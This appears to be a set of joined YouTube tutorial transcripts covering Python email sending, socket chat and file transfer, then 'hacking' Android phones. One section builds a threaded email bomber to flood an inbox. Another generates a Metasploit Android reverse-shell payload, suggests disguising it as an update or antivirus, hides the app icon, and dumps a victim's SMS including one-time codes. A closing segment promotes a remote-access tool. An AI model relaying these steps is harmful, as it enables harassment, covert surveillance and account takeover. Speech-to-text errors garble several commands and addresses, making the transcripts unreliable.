What's up guys, and welcome back to the YouTube video. In today's video I'm going to show you how to create an email bomber and ruin our friendship. Of course not, we are not going to ruin our friendship, are we? We are not going to ruin our friendship. We are going to create and understand how an email bomber works and how to create one. So the concept of email bomber means bombing one's inbox with multiple number of scam emails and making that person annoying. So that's actually according to me called email bomber, because it is not actually an hacking or cracking feature and all, but it's just a cool thing to watch multiple number of thousands of emails crashing in one's email box. So now, before we get started, as always, a quick disclaimer that please make sure that you learn something from this, and we are not going to actually use these tools on others for destructive purpose. Of course not. I'm not going to use that. Please don't please don't use that, because if you want to ruin your friendship, please go ahead. So in this video, we are going to study how to send emails using Python, how to automate sending emails using Python, such as if you want to schedule an email to someone and all, yes, you can use this feature. Or you have to send emails to multiple number of clients. It will be really useful. Plus also we will be doing an email bomber to understand how this works and how we can actually know the devil side of this feature. So now this video will be split up to three main categories mainly. The first one will be showing how to send emails using Python, and the second one will be to show you how to schedule emails using Python or send to multiple number of clients, and the third one will be how can you create an email bomber ultimately. So we'll be also looking how to use threading module also in that category. And also in this tutorial series, I'm going to teach you the newest method to implement email sending feature, because the oldest methods are outdated using less secure apps feature from Google Gmail. So in this video, we are going to use app password. I'm going to show the right step and the step-by-step method to implement this. So hop on. What's up guys, and welcome to the part 1 of this video. In this part, we are going to learn how to send simple emails using Python. So before you get started scripting up how to send emails using Python and all, first of all, you have to create an app password from Gmail. Go to your accounts, and inside security tab, you have to go inside signing into Google, and you must see an app password section over here. Only if you have enabled two-step verification. First of all, you have to enable two-step verification on your account for this to work. Otherwise, this app password will not be shown there. First of all, you have to enable two-step verification, then goes into the app password section, and it will ask you to verify it's you. So let me just enter my password. Oops, I just got it wrong. And type enter. And after you are in, you can see a tab named app password, and now you have to create an app password for mail. Why mail? Because we are going to send emails using Python, so we must create an app password for mail. Then I'm going to go with Windows computer, because obviously I'm going to use it in a Windows computer. So Windows computer and generate. You will actually generate an app password for mail. You can actually access your inbox, or you can send mails using this account using this app password. So it's a one-time only show. You have to copy directly. After this, it not be shown. So press done, and after it's complete. So now open up VS Code. So now let us get started by initializing our password, which we have already taken from the Google accounts, like this. And we have to import our module, which is SMTP-lib, which stands for Simple Mail Transfer Protocol. It's a standard library already inbuilt and pre-installed with default Python. So now let us get started by initializing a variable. This is equal to smtplib.smtp Simple Mail Transfer Protocol, and we are going to pass in smtp.gmail.com. So for the first parameter will be the domain in which we have to send mail. So now I'm going to use Gmail in which we have to send email. So if I'm going to use an Outlook domain, then we have to pass in smtp.outlook.com. So and also I'm going to pass the port for in which we have to send email. Now we have to, first of all, we have to start a secure connection with the server. Then only the Google will allow us to send an email using its Gmail. So s dot start tls, and now we have to server dot login using our email ID, and the second parameter will be password. So let me just go ahead and grab the email ID from here. Where's the email ID? You can see not scratch online. So those of you are wondering why I'm using Not Scratch Online, it's a startup that I have already started but I haven't deployed, and it's just a dummy account to demonstrate to you guys about how to send emails using Python. So this is the email in which I'm going to use. So let me just go ahead and copy. So let me just go ahead and copy the Not Scratch Online, the email ID from here, and let me just go ahead and paste this over here. Oops, where is that? Now, okay, I haven't closed the codes. Now you can see first parameter will be the email ID and the second parameter is the password that I already told you. Now we have to send mail. Before that, we have to initialize a message variable in which we have to send, right? So say message is equal to, let's say hello, this is a message from Python. And I will say s dot send mail, and the first parameter will be to pass the sender email ID. So in this case, this one, and the second parameter will be the receiver email ID. So I'll be passing my personal email ID. Please don't try use the bomber on me, please. So the third parameter will be the message in which we have to send. So after that, you can just quit the server out. So let me just run and see how this works. It's waiting. It's currently waiting for this to execute. You can see it's executed now. Let me just go and open up my Gmail and see if this is received or not. You can see I'm currently on our and just refresh this page, and you can see notscratchonline@gmail.com. Hello, this is a message from Python. Now let me just go around the code and just explain again how we are sending this email. First of all, we have initialized a password from Gmail using the app password tab from Google accounts, and we have initialized a message variable in which we store our messages. And then we have passed the domain name in which we are going to use to send mail, the port, and we have started a secure connection. After that, we logged into the server using our email ID and password. Then we have sent email using the sender email, the receiver email, and the message we have to send. Note that for using send mail, we have to be logged in the same account in which we have to send email. So after that, we have created the session. So that's it for the part 1 of this video. So guys, welcome to the second part of this video. Now in second part of this video, we are going to see how to schedule emails using Python. If you want to schedule email to a person or you are not available at that moment, you can schedule using Python. You may also know that Gmail also has this feature to schedule emails to clients and sender and receiver, but in this case, we are going to implement this using Python. It's a powerful weapon. So let's get started by putting this thing inside a function named, say, define send underscore mail, something like that. So it takes no parameters, and we'll be just go ahead and put these two variables outside the function. So let it be here. Oops. Let me just correct the indentation levels. There we are. Now, whenever this function is called, this statement gets executed and the mail is sent. So now in order for the scheduling to work, we need a time module, right? So I'm going to import date time. So say import date time. So now I'm going to get the send time. Send underscore time is equal to datetime dot datetime dot, I'll say the first parameter will be the year in which you have to send email, and the second parameter will be the month in which you have to send the email. So I'll just say 07, and the next, I'll say 7, and next parameter will be the date in which you have to send email. I'll be passing 30, and the next parameter will be the hour and the minute you have to send email. So I'll go with currently what's time. I'll go with 11:21, and this parameter will be passing the time into millisecond to the send time variable, and we are going to say time.sleep till that time. Word time.sleep send underscore time minus time.time. Essentially what this does is that it will actually return this time as millisecond, calculating year, day, and everything at all, and returns this as a millisecond value, and this will also return the current millisecond value, and the send time minus the current time will be in which we have to send email. So we will be sleeping till that time. So after that we'll be calling send mail function, and after that we'll be printing mail sent. That's it. Now let me just see the time. It's 11:20, and let me just go around there and see. And it's waiting. Daytime and float. Okay, I just forgot. Sorry, we had to pass in here send time dot time stamp minus time. That is because it's not a floating point value, and this is a float value, so that's why it's a problem. Now you can see it's 11:21. We have to change this to 11:22, and let me run and see. Oops, I am really sorry guys. You can see send underscore mail. I just really misspelled that. We have to change to send email, and that's what I really wanted. So I'm just going to run that again. It's 11:22. Probably it will send email. Non-negative. That is because, let me just change to 11:23 and rerun that again. You can see mail sent. There we are. As you can see, it's 11:23 and mail is sent. Let me just go and check that real quick over here. You can see I'm just gonna refresh first of all. Yeah, you can see hello, this message is from Python at 11:23. Perfect. Now let me just go and explain this once again what I have done here. So let me just pull this down here. Okay. So basically it will actually create the time object in milliseconds, and will actually subtract it from the current time, and it will sleep till that time. So after the sleep is complete, we will send the email, and it will print Mason. Okay, also you can just give some fancy code thing like mail is scheduled in this date, in this time, and all. You can just also create command line arguments and all using os.argv function and all. So that's it for the part 2. You have made it this far, and welcome to the part 3 of this video. So this part is where we're going to create ultimately an email bumper in which we are going to send infinite number of emails to one's inbox and crash them off. So in order to send emails, is multiple number of emails, just put this function inside a while true loop. Just get rid of this thing and this thing over here, and just get a number. N is equal to input enter the number of emails, just like that, and we will get an input from the user. After that, we are going to create a function like for I in range of say n. Let me just put this inside this loop. So now if I run that, you can see the number of emails to be sent. So I'll just say 4, and what the hell's going on? String object cannot be interpreted as. Okay, that's a real strange thing, but I'll just say int of n. So I'm just gonna run that again. I'll say 4, and you can see it's waiting and saying it will be sending. Yeah, there we are. Mail send. But you can see it is taking so much time to send a mail. I'm just gonna clarify if this works. Okay, I'm gonna go ahead and refresh this. You can see 1, 2, 3, 4. We got 4 mails from this account. So it's really slow, right? You can see it's super slow, and it's not really worth time for sending this much emails at this really slow pace. So we are going to increase the pace in which we can send emails. So I'm just gonna get rid of these things and import threading. But threading module, this is the threading module can actually send multiple number of emails at the same time. Like the processes will be done in parallel. That's what a threading module does. So for that, let me just go ahead and say a new module. A new variable named threads to a list, and I'll say insert in here to create a thread. Thread is equal to thread. I'll say target is equal to send mail, _mail without arguments. So send mail, so send email. Why I'm doing again? Send _email, and I'll say t.daemon is equal to true, and I'll say threads.append t. Did I actually create this thread? Oops. Did I create this thread over here and append it to the list of threads? Now we have to start all the threads and join all the threads. For I in range of int of n, and I'll say t.start. It also says for I in range of int of n, and also say t dot. Okay, so we had to pass here threads of I dot start, and also we had to pass here threads of I dot join. So this should start each thread till n, and it will actually join all the threads all together to be done parallel. So let me just go and run for the last time and then see how it goes. So let me just go and type in 10 emails. So type in them, and you can see mail sent, and here we are. We have sent 10 mails. Let me just go and check this out if this actually worked. You can see my inbox is currently clear, and if I refresh, you can see I have got the first mail over here.
and the other mails will be reaching us subsequently. It's currently syncing, and we just go ahead and run that again and type in like 20 emails. You can see mails and mails and mails and so really fast, and it is bombing this person's inbox over here. Currently it's popping up over here, and there we are. You can see. Yeah, each one is coming along. Yes. So guys, make sure that you don't use or try this out on your main account. Google will definitely flag you and actually flag you as a scam. So please don't try to use it on your main account. Probably you will get actually banned from using Gmail. So thank you for watching this video. Make sure that you like and subscribe to my channel. It will mean a lot to me. If you have any questions or comments regarding these topics, let put them in the comments below. I'll be definitely checking that. Also, the code that I have done here has been uploaded to the respective GitHub repositories. I have already provided the link to them in the description box below. Often definitely checking that out, though it will be really helpful. So, until then, ciao.
What's up guys, and welcome back to the YouTube video. In this video we are going to talk about socket programming and creating a chat room. Before diving into it, let's have a quick word from our sponsor of this video,
NodeScratch. NodeScratch is an online platform to create, modify and save your works and to-dos. I have personally using this for a while now. I use it to save my diary entries and to-dos. The main speciality of this application is that you can log in whenever and wherever you need, and you can get your notebook and work back.
so feel free to check it out, link in the description, completely free. Okay, so let's dive into our topic today. So today we are going to create an architecture of a server client program which is actually sending and receiving messages each other. So it's basically a server. We have a server script and a client script which will actually exchange messages each other. So let's start coding it. First of all, you need a module named socket module, which is basically already installed in your Python, already pre-installed. So first of all, we need a server-side script, usually named as server.py. You can see it in your directory. Okay. So it will be named as server.py. And you need another script which is named as client.py. So we have two scripts now, which is named as server.py and client.py. So let's start with server.py. So first of all, you have to import socket module. S object is equal to socket.socket, and we have to create socket and socket.af underscore init, which stands for address family of IPv4, and socket.sock underscore stream, which stands for TCP protocol. Now we have to bind a connection. S.bind, which is a tuple. So first parameter will be an IP which you want to listen for, and second will be the port you are listening for. So if in this case I am going to put my local IP on it. Local IP, comma, my favorite port is 1234, and now we have to start listening for connections. Listening for 5 queue. We will listen for 5 connections at a time. And now we have to accept for connections. A comma C script accept. If listening connections, any connection, arriving connections will be accepted using a comma C accept. Then after that, starting while through loop, which will actually receive it and send messages. In this case, server sockets, so we are sending messages using server. So message is equal to input of just arrow, and we are going to send it to the client. So it will be a.send message.encode in PDF8. Okay, that's all for the server script, right? Okay, now let's start working with client script. Just run it real quick just to check it out if any errors is popping up. No, let me just give it this print statement so that we can know if this is working. Listen for connections, connections, okay, listen for connections, right? And if anyone has given a connection with us, string connection from accepted. Okay, now that's been said, we have to copy this thing which we need in transcript. So it should be connect instead of binding, so we have to connect to the server script. Okay, so now we have just receive things, right? We have already connected, so start receiving. If this is working, then we will just print out it is connected. Then while true, we will start receiving message. Just print out message and comma s dot receive with the buffer data 1024. It will be buffering data in which at the rate we will be receiving data from, and encode decode using the same format we have done there, UTF-8, and hope that will work. Okay, now let's start running it. So we will come to the terminal real quick. Desktop slash speak it bigger. Video Python 3 server.I. Oops, that is already used. Okay, let's change to some 6535 or something. Saving that. Listen for connections. Side Python 3 Python says connected, and it says connection accepted. So if I send hey, you can see message from hey, right? Message received hey. You can play around like that. From the connection, okay, you see we received that. Hello world. You see we are sending and receiving each other. Now the thing is that it's only one side script, right? We are only sending to one side. We cannot send it on this side, right? Okay, that's what I'm really eager to do in the next video. We are going to actually create a chat room which we can have multiple clients. So that's pretty much it. We have completed our server and client scripts. So make sure you check our responsive description, and also make sure you subscribe to the channel. Until then, ciao.
What's up guys, and welcome to another YouTube video. In this video we are going to create a chat application that is going to overthrow WhatsApp. So it has got a name. Its name is Master Chat. We are making this from scratch. We are going to create it from complete scratch, and Python 3 socket module. If you haven't watched my socket module beginners tutorial, you have to watch it. I will be putting it somewhere. You can just go ahead and watch that, and let's get right to it. So this will be our architecture today. The server will receive message from the client, and server will redistribute among the other clients. If the server receives a message from this client over here, and the message is received by the server will redistribute among the other clients. This is for the TCP connection, so we are going to implement a TCP connection today, and I am going to also implement it with Nginx server. So let's get it.
So first of all, open your preferred, ideally mine is PyCharm. So alright guys, I'm going to create a new project. I'm going to name it as math teacher. Creating that, loading components. So with that being said, let's get started. So first of all, I'm going to write a server-side script. So starting with importing socket module. Socket dot af underscore inet, which stands for address family of inet, and socket underscore stream. Okay, then we are going to bind to our local address, so it will be 127.0.0.1 on the port 6535. So let's do bind connection 127.0.0.1 comma 6535. Port will be 6535. So now we have to listen for connections, which will be in our main loop. While true, if I can spell correctly, while true, C is equal to accept, and we will have a number of clients, right? Multiple number of clients. So I am going to create a list of clients. Clients is equal to a list. Then if a new connection is accepted, I am going to append to the client. Okay, so clients dot append client A. A stands for the client socket, right? The socket of client. And I'm also going to import the threading module. I'm just going to import everything from client. Thread, import everything. So I'm going to start a new thread. Which will be named as receive, and the function will be define receive. I will just tell you what is happening going on here within a sec. What it is happening here is that I'm going to call this receive function here, which is going to listen for all the individual clients. If a new client is connected to our socket, the server is going to start a new thread for listening if any message is coming from the client or not. So it define receive, and we will just write s.receive or the client socket, right? I'm going to take a parameter that is receive A is going to set A, and A dot receive 1024, and it is going to buffer at 1024 byte to be received, and A dot receive, it will be message, right? Message is equal to A dot receive. Wonderful. Just for second record, I just want to print message receive and comma msg dot people udf8. It will actually only print in server. Actually, we have to receive from each client and actually distribute. So I'm going to send it after receiving a message from an individual client. I'm going to send it to every clients. So for I clients, which is our client list, which contains every clients in our server. So for I clients, I dot send message dot encode in udf8. Make sure that you encodes in the same way in every places you encodes. So actually it is a type of convert to byte. Then next thing we have to do is that we have now receiving the connections, and we have sending to the other clients, right? Okay, it will be a tuple, right? Just to be a tuple. And also I just forgot to listen, so you have to listen for F5 connections in a queue, also to make sure that our program doesn't crash. So with that being said, let's work on client script now. So I'm going to go ahead and copy this to my client.py, and we'll, instead of binding, connect to this address, and we will have to receive in a thread. So define receive, and I write s.receive at 1024 byte, which will be our message to be from the server, right? Message is equal to, and we just print out that .The code in UTF-8 as we have already encoded in the other main server.py script. So after that, I'm going to create a new while true loop. While true. In here, I'm going to accept for message to be sent, right? Input of just like that, input of, and I say s.send message.encode in PDF8. And I'm also going to create a thread for receive function. Also make sure that the functions running inside the threads should be in a while true loop to receive it continuously. So while true, and going to client script to set it to while true, and while true. So let's test it for the first time. So God please help me. I'm going to run Python server.py and Python client.py. Okay, nothing showing up till now, no errors. I'm going to run send hello. Perfect, it runs hello. So I'm going to run another client.py says hello, right? Perfect. So I'm going to send hi, and it runs hi. You can see that hi is also here. And another client is going to connect Python client.py and hello guys, and you can see that hello guys is here, and also it is also in here, and the server also prints out received hello guys. So I'm just going to close this connection, and you can see that our server is crashing. So by now we need is that we need perfect exception handling and also structure a code. So let's get into it. For in a chat room, we need to identify a person, right? So I'm going to get the user's name, actually the client's name, and I'm going to sum it with the message and display that. So for that I'm going to ask the user for his or her name for the first time when running input of enter your name. And when we send the message, I am going to just sum string of name with the message and encode that. So what happened? Why this is turning yellow? Okay, I'm going to just open up another bracket string, put a string inside. Yeah, perfect. Now we have a name for our clients. Each and every client have to now write a name first before getting into our chat room. Now also we need an error handling here and there. That is try and accept statement, so that the app doesn't crash even if there was some like connection reset error or something. So accept, just crash it out, don't print that anything. In server side too, we need to log everything, each and everything that is happening in the server, right? So we can beautify it if you need, but I'm just printing out for now. Plus connection accepted. And now we need to just beautify it. Control Alt L will actually format the code into just let's write a little bit and Control-Alt-L. There we are. So now I'm going to have an error handling statement over here. Try. Then we also have an exception statement, except. Oh, we had to print out exceptions in server because it's really crucial for our application. If the server dies, the application dies. So exception as E, print out string of E. It will also print a negative mark with that. It means it's bad. That right? Okay, and plus with that. So almost our application is now perfect. You can add timelines or log times now. Timestamps will help you to identify if anything goes wrong at what time, which message was received at what time and all. So now I am going to deploy this app into Ngrok, which will allow us to connect to my computer through the internet. Ngrok is used for tunneling connection to my computer. And let me open up Ngrok real quick. Okay, CD downloads, desktop, CD downloads, CD Ngrok, CD. Now I have to run Ngrok, TCP protocols for TCP connection, TCP through 6535. So the server is now starting up now. Online and everything is good to go. Now I am going to share my forwarding IP. This IP is the TCP IP here, and also script to my friends, and let's see how the chatting goes. So now I am having some second thoughts that if my app crashes in front of my friends, they will while they are using it. So I am going to run it again one last time to check that everything is working properly fine. Make sure you also write every block where there can be a stand for an error. Try putting it a try and except statement every way possible so that the app doesn't crashes even if the error is popping up. We don't want our application to crash if there is some slight error like a connection was exited from another client. So I'm just going to run the server one last time to check that if anything goes wrong or something. Python 5.5, and it is asking for my name, Ashish, and it is prompting for a message to send. So I say sending hello, hey, Ashish, hey, and you can see that connection accepted, message received, Ashish, hey. And I'm going to open another client, Python client.py, enter a name, my name is NAB, and it's prompting for message to send, hello, this is NAB, hello. See, I have already received the message over here. Now I am going to open another client, Python client.py, enter a name, and I will just name it as Alex or something, and I just ask for message to send, hi guys, and you can see Alex, hi guys. You can see the hi guys is over here and also here, also in the server too. That's it. I'm going to send it to my friends now and let's see what they say.
So hello guys and welcome to NAB Lab, and I'm Belfin and I'm the electronic expert here, and we are waiting for his server to start so that I can start his client and we can start chatting in the chat room.
Yeah, let's begin. Yeah, let's get this going. Start. Yeah.
Okay guys, my friends are joining in, and let me say hello now. Hello now. It's kind of cool application. You can, that's just a terminal, but it does the job. So nice.
Okay, let's minimize and yeah, but this client we have connected and I'm typing my name. Okay, and I'm joined. Yeah, let me see if he's online. Oh yeah, he's there. Okay, bro.
What's new?
What's new? Nothing much. Just chilling. Just chilling. I'm not very fast at typing, so to be a bit slow. Doesn't matter, I think. So stay tuned. I will be uploading an Arduino video very soon, and you could learn about Arduino and stuff, programming it, and we could rock.
Pretty much for in this video. I know that this code is not really optimized for chat application, but it kind of do the work. So I'll be also placing the GitHub link for the code in the description, so make sure you check that out. And forgive me if I just forgot anything about this. And please make sure that you like and subscribe. Our new video will be coming up real soon. I'm also thinking of giving it a GUI, the match chat GUI. So until then, ciao.
What's up guys, and welcome back to the YouTube video. In today's video I'm going to show you how can you send and receive video files or music files or whatever files using Python socket module. So if you're new to Python socket programming and don't know the basics of Python socket programming, you can check out this video. I'll be providing it in the annotated sidebar. You can just go ahead and watch that before this. And also, if you doesn't remember that the socket module is working, and I'll just go and watch that, it'll be a brush up on the skills. Plus, I have already done another video on which have multiple number of clients connected all together and chatting simultaneously. It's basically a chat room. I will be also providing that link in the annotated sidebar. Just go ahead and watch that too. And also, after watching this video, don't forget to integrate the chat application with the video sending feature. And you can actually send video as well as chat at the same time in a single chat room. It will be awesome. So without further ado, let's get started. So guys, now let us fire up our favorite text editor over here, Sublime Text, and create two scripts, server.py and client.py. So it will be first of all server.py and create a new file. What the hell was that? Shut that scope and server.py, save and new file, and save that client.py. Perfect. Now we have two scripts, server.py and client.py. Also, just a reminder that if you don't know whatever thing that I have trying to do here, just go ahead and watch the basic socket program video that I have already provided in the annotated sidebar. So now let us get started by importing socket module. Import socket module, and s is equal to socket dot socket and socket dot af underscore init, which stands for address family init, which basically says that we are creating a socket on IPv4 address. And the next parameter will be socket dot soak underscore stream, which stands for TCP protocol. We are mentioning the socket that we are going to create a TCP protocol socket. So now we have to find the connection to an address. So now we will be providing the local IP for now. If you want to connect across internet and all, we have to provide that IP address of the device. So now we'll be going with local IP, which will be 197.0.0.1, which will be the address in which we are going to listen to. So it will be a tuple. Okay. Now we have to also specify the port in which we have to connect to. So it will be 6535. And now we have to listen to the connection, this parameter over here says that we have to listen 5 connections in a queue. So that's what it is. Now we have to receive connections, right? Now accepts connection. So now we are going to
a comma c accept connection, s dot accept connection. So a stands for the client socket. So now basically we have created a socket over here, socket object, which says that we have creating an IPv4 socket in TCP protocol, and this is the address on which we are going to listen. Listen for the connections for, and the port in which we are going to listen on. And we have created a 5 connections in a queue, and also we have created, if any connections incoming connections, just accept the connections into the client socket. So if any connections received, we will be printing connection received, something like that. And now we are going to send a hi message to the client. It'll send, and it'll say hey or hi, something like that. So hey, and we'll be encoding it as UTF-8, and that's it for the server side, for just to send a message hey. Now let's see if it works. And now we have to copy the first 2 sentences, which is same thing on the client side. So paste that over there, and now instead of binding, we have to connect to the IP address in which we have specified over here, which will be 127.0.0.1. So client has to connect to, which will be a tuple, of course, and we'll be specifying as 127.0.0.1 and the port 6535. Okay, forgot a bracket over here. Okay, now s.connect over that IP address. Now we'll be just receiving that s.receive buffer size 1024, and we'll just printing that out. Print that out. So we're just gonna save that, and open up the CMD. Open up, and okay, cd to the stop, and python server.py, and oops, what was that? Okay, sorry for that, just a spelling mistake. Okay, now running that, server is live now. Let me just go ahead and run the client.py, and you can see we have received hey from the server. You can see connection received, and the program is terminated. Now we have to, instead of sending a hey from the server, we have to actually send a file towards the client.py, the client side. So for that, first of all, we have to open a file, right? So for that, I have created a file over here. As you can see, download, and if I go to open that, you can see a file, a pinkin over here, and we are going to send this file to the client. So let me just go ahead and create a folder and name it as server, and for just it's just for getting a better clarification, So server is over here, download is over here, and the client is over here. Now if I come in here, you can see we're going to override is inside server side. Okay, you can see it's now desktop/server/server.py. Now we have to first of all open that file before sending. So let me just go and open up and show you how the file is. So let me say data is equal to open download.jpg, and it'll be opening as RB, which stands for reading in binary. I'm just printing it out, print data.read, and if I run that, oops, what the hell just happened? No such file directory. Oops, okay, now it's work. If I run that, you can see this is the binary inside the PNG file. If I copy all of this and rearrange it as a PNG file, it will be showing this image over there. So now we have to send this thing to the client.py over here and make it to a PNG file. So that's what it is. Now let us get started for that. So now I'm going to create a with open download.jpg file, and I'll be opening it as RB, and as f, and now you're saying f dot read with a buffer size of 1024. Why is that? We are going to send a buffer size of 1024 to the client side. We cannot send everything all together. We have to specify a correct buffer size in which they are going to send and receive. This buffer size and the server buffer size should be equal. So you have to read 2024 and it will be the main data for us to send. So now let us go ahead and remove this thing over here. Okay, oops, what is that? And saving that, and now we have to send to our. Okay, before sending we have to specify that if not data, then break. This is because just to make sure that if data is equal to nothing, we have to break this loop, right? Okay, I haven't specified a loop. We have to should be in a loop to while true, and it will make sure that every data is sent with a buffer size of 1024 towards our client. So we'll be specifying a.send, and it just was buffer size of a.send data. That's it. So now let us go ahead and do the client side. So without receiving this, now we have to open a new file, which will be open client.jpg, and write it as a binary file as f, and first of all we had to receive and then write to the jpg file. So first of all, data is equal to s dot receive 1024, and now f dot write to the file, the data. Also we must also make sure that if not data, then break the loop. So I'm just gonna save that. And also sorry to mention that this should be also inside a while true loop, while true. So now that should be done. Saving that and saving that. I'm gonna open up the cmd and run python. Oops, you will cd to server first of all. Cd server python server.py, and it's running now. And now inside client.py, if I run that, you can see it says finished. Okay, now it's inside. You can see the client.file. You can see the client file is over here. You can see the penguin has been sent. You can see that the client jpg is over here. We have sent the download.jpg from here using the server script to this directory over here, the client.py, and the client jpg is over here. Likewise, if you change the IP address, you can actually send it from person to person or across the internet. I have already done that in my other two videos. You can just check that out and how to implement this all across the internet. So definitely check out the other two videos. It will be really helpful. So now let us do some more beautification to this code. Just some sort of, it's not actually necessary to understand the core concept, but let me just go ahead and pin something over here, something like waiting, and after this let me just go ahead and print file received. We'll also give it a plus sign, and oops, plus sign, and also let me just go ahead and after while true loop, this is called f.close, and save that. Also in the server side you can see connection received, and also let me just specify print file sent, saying that, and let me just go and run that again. Okay, command prompt and run that. Server.py is already started, and run the client.py, and you can see waiting file received. Just go and delete that and show that again to you. File server.py is running, and if I run the client.py over here, you can see client is received over here. So that's it for this video. Make sure that you like and subscribe to my channel. It will mean a lot to me. If you have any questions or comments regarding this topic, just put in the comments below. I'll be definitely checking that. Also, please feel to comment down below how you have managed to integrate the chat room with the video sending and receiving feature or the file sending and receiving feature. So thanks for watching and have a nice time.
What's up guys, and welcome back to the YouTube video. In today's video I am going to show you different methods to hack into an Android device. So this video is only for complete education purpose only. Make sure that you don't hack into your relatives and friends Android device and get into some kind of trouble. So with that being said, let's get started. So if you are into Android hacking and remotely controlling them, the first tool you need in your arsenal will be ADB and scrcpy, which are basically used for remotely controlling and accessing an Android device. So this is not actually a hack, but it's an official feature of an Android device to debugging purposes, and I am going to exploit this to gain access to my own Android device. So first of all, let's get started by installing ADB and scrcpy on your Linux machine. So it will be preferable to have Kali Linux installed for hacking purposes. So if you have another Linux installed like Ubuntu and all, it was also fine to go with that. So with that being said, let's start our terminal and install ADB. So let me just zoom in, sudo apt get install ADB password, and it's already installed for me. And now I hit install scrcpy. Install scrcpy, and there we are good to go. ADB and scrcpy is already installed on my system. So first of all, to get started with ADB and scrcpy, grab your Android phone and go to settings, about phone section, and press your version number for 3 to 4 times, 3 steps, and after a couple of times it will show that you are a developer. So just go to additional settings and you will see developer options there. Go into that and you can see a USB debugging option there. Just toggle it on and it will actually warn you for that. So after plugging your device in, you have to fire up a terminal, and let me just zoom in a little bit and type in ADB devices, and it will actually show the devices, available devices attached to your computer. Now type in ADB TCP IP 5555. What this does is that it will actually open a port for listening for ADB connections over the port 5555. Clicking that enter, it will say restarting TCP port mode. So that's set. Now let's unplug the device from your computer and let's go ahead and find out the IP address of the Android device and just connect to it. Connect. Okay, and you can see it's connected, and you can see that it's not actually connected anywhere, and I'm going to remotely control my Android device. So just type in scrcpy, press enter, and let me just close this one here a little. Okay, you can see that it's actually wireless, and I can actually control it using my mouse here. See, I can just control it with my mouse. So let me just open up a new terminal here real quick. Zoom in and just type in ADB, and you can see that there is a ton of commands you can just actually do to this Android device wirelessly. So I can actually install, delete an application, delete a file, push a file, pull a file, and you can actually you can do whatever things using ADB and scrcpy. Method number 2 will be metasploit framework. Later in the video you have seen that using ADB and scrcpy you can actually control and access a device, an Android device within your reach or within your local area network, right? So this is where real hacking comes in. Metasploit framework gives access through the internet without touching the device. You can have the control over the device. Just send the payload by saying it's a software update or it's an antivirus or something, and the user or the victim will install, and you can have access over the Android device. So for getting started with Metasploit framework, you have to first install, right? So if you're on Kali Linux, it will be already installed, so you don't have to install anything. So if you're on another Linux distros, just type in sudo apt get install Metasploit framework will just do it for you. So if you're on Kali Linux, it's already installed, so you don't have any trouble. So just type in venom. When it gets to that, there is a couple of commands you can do with this, but I'm only interested in Android payload. So before doing that, let me just fire up my Nginx server. So you know that this is hacking us over internet, so I have to create an Nginx server. So I can start up Nginx TCP on my port 0444. So let's just start up. Just make it a bit smaller. And you can see that there's an IP address over here which I'm interested in. So this will be our public address for our application. So I'm just going to create venom -p android /meter /reverse _TCP. The L host will be our IP address which we have, right? So it will be our Nginx server address, and the L port will be our Nginx server port. So it will be 14793. L port will be 14793. Then we have to write the file to and file name android.apk. So press enter, and it will actually take a 4 to 5 seconds to create an Android APK. Perfect. Now you can see that. Just press ls. You can see Android APK is already here. So you just type in scrcpy and open up my victim over here. There we are. My victim is already set up and complete, and we just open up. So my victim is already here. So let me just go ahead and create a new tab using adb install android.apk. APK. Press enter. Performing streamed install and install anyway. The device knows that it's a malicious APK and it is warning me. Don't send, please. Okay, perfect. Now we have our application installed. So now we have to start up the MLS console for have the access MS console. It will take about 2 to 3 seconds to start up MS console. Perfect. Now we are in, and you can see that this is Metasploit framework console open here, right here. Now we have to start use exploit / multi-handler, and you have to set payload to android /meter/reverse_TCP. Press enter, and you can just ask for show options if you don't know whatever options you had to fill out. Now you have to pass on the L host you are working with. So set L host to be our IP, which is 127.0.0.1. Recall that we are actually forwarding the Nginx port to our local IP, right? So press enter, the L host setup. So now just type in exploit, press enter, and it is started reverse TCP handler on the port. Perfect. Now let me just go ahead and open the application. It will have access, and just continue, and okay, and you can see that sending stage bytes to 107.0.0.1. Now you can see that we have the access to the Android device. Let me just type in help, and you can see that whatever things we can actually do it remotely, right? Okay, let me just first of all hide the app icon, right? Hide app icon. Okay, perfect. Now the user will not know even if there was an application there, right? Now let me just go ahead and let me just get the SMS list of this guy. Dump SMS. Yes, we have fetched 927 SMS through the internet of this device. Let me just go ahead and open the file managers to see that. Instead, you can see that SMS dump. Okay, here we are. We have every file, every SMS of that person, including the OTP list. Easy. Now let me just go ahead and do another thing. Let me just pull a file from this guy's phone. So now let me just open up the shell and see the directory inside the phone. So cd to /sd card /cd to SD card. Let me just ls, and you can see we are inside the Android device, right? Let me just pull a image file from this phone. Exit, download /SD card / this file. It's downloading now, and voila, we have got the file. Let me just open up the file manager and see the image. Here we are. This is the image inside the phone, and we have wonderful things actually we can do with this. I should get contact list, geolocate, record mic, record webcam, like record screenshot, and we can do create new directory, remove directory, uninstall application, etc. So that's pretty much about Metasploit framework. So that's it. Make sure you subscribe to the channel, and if this video gets sufficient subscription and likes, I will definitely do another video where I am going to hack an Android device completely remotely. So until then, ciao.
What's up guys, and welcome back to the YouTube video. So in today's video we are going to learn about Lemon, how to use Lemon, how to get started with Lemon, and how to use Lemon to connect it to your own Android device in which you have authorization for. So this video doesn't have any connection with the H word, because I'm not going to use the H word anymore, because this video is made solely to learn and understand how to use Lemon to connect it to your own Android device, and learn how to use Lemon in case you have to connect to your own Android device from your computer. So the sole existence of Lemon is to understand and connect your own Android device in the need from your computer. So Lemon is a tool which is used to remote access your Android device from your laptop or PC. You can just install Android RAT in your Android device, and you can actually control your Android device from your PC or computer or whatever devices you use. The better thing about Lemon is that it has a GUI you can actually operate into. If you use ADB or scrcpy or the Metasploit framework that I have already shown in the other two videos, it actually doesn't have a GUI, and it's kind of really hard to use them. So the Lemon framework is really easy to use compared to the Metasploit framework. They both do exactly the same job and the same process, but in different way, of course. So this is going to the part 2 of the video series. I mean the H video series, but I'm going to not say that word. You know what I mean. So this is going to the part 2 of the H series. So you can just watch the first part of this video. I mean, this video doesn't have any connection with that video, but you can just watch the part 1 of the video. I'll be putting in the somewhere. You can just watch that. So in that video, I have shown how to use ADB, scrcpy, and metasploit to connect it to your own Android device. So you can just go ahead and watch that. It will be really informative and helpful also if you are into this topic. So that's pretty much for the intro. Let me just, without any further ado, not so fast. So I just want to tell you guys that there are millions of channels providing the same content. So you probably think that what's the difference between us and them? So the main difference between us and them is that so the main difference between us and them is that they do have like millions of subscribers and we have like 700 subscribers. So please do subscribe to my channel. It will mean a lot to me. If you want to see more content like this coming up soon, do subscribe. So let's get right into the 